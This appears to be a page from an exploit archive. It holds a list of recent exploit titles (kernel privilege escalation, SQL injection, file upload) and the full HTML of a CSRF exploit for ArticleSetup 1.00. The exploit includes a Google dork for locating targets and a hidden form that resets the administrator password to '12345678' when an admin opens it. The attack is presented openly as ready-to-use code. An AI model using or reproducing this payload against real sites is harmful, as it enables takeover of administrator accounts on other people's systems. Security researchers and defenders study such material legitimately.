62962d90b0
16 new exploits Linux Kernel < 2.6.34 (Ubuntu 11.10 x86 & x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2) Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2) Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit) Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit) Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities Dream Gallery 1.0 - CSRF Add Admin Exploit Apache Continuum 1.4.2 - Multiple Vulnerabilities Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit Valve Steam 3.42.16.13 - Local Privilege Escalation ArticleSetup 1.00 - CSRF Change Admin Password Electroweb Online Examination System 1.0 - SQL Injection WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload WordPress Creative Multi-Purpose Theme 9.1.3 - Stored XSS WordPress WP PRO Advertising System Plugin 4.6.18 - SQL Injection WordPress Newspaper Theme 6.7.1 - Privilege Escalation WordPress Uncode Theme 1.3.1 - Arbitrary File Upload WordPress Double Opt-In for Download Plugin 2.0.9 - SQL Injection Notilus Travel Solution Software 2012 R3 - SQL Injection rConfig 3.1.1 - Local File Inclusion Nagios XI 5.2.7 - Multiple Vulnerabilities
37 lines
No EOL
984 B
HTML
Executable file
37 lines
No EOL
984 B
HTML
Executable file
<!--
|
|
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
|
|
# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
|
|
# Date: 2016/06/04
|
|
# Exploit Author: Ali Ghanbari
|
|
# Vendor Homepage: http://articlesetup.com/
|
|
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
|
|
# Version: 1.00
|
|
|
|
#Desc:
|
|
|
|
When admin click on malicious link , attacker can login as a new
|
|
Administrator
|
|
with the credentials detailed below.
|
|
|
|
#Exploit:
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<form method="post" action="
|
|
http://localhost/{PACH}/admin/adminsettings.php">
|
|
<input type="hidden" name="update" value="1">
|
|
<input type="hidden" name="pass1" type="hidden" value="12345678" >
|
|
<input type="hidden" name="pass2" type="hidden" value="12345678" >
|
|
<input type="submit" value="create">
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
<!--
|
|
####################################
|
|
|
|
[+]Exploit by: Ali Ghanbari
|
|
|
|
[+]My Telegram :@Exploiter007
|
|
--> |